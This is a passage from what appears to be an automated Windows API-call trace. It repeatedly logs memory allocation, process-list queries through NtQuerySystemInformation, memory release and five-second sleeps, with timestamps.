Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.063] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.065] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.065] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.078] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.078] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.081] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.111] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.112] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.113] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.114] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.125] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.127] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.128] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.144] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.145] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.156] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.157] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.159] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.160] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.171] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.175] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.187] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.188] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.188] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.191] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.203] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.205] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.206] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.219] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.223] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.234] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.234] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.234] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.235] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.237] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.237] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.250] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.251] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.251] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.251] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.253] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.254] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.266] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.268] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.282] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.282] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.285] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.300] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.302] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.302] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.312] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.315] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.330] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.331] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.343] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.343] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.344] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.346] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.346] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.359] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.360] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.360] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.362] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.363] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.374] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.374] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.375] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.375] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.378] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.379] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.390] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.391] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.393] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.393] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.405] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, 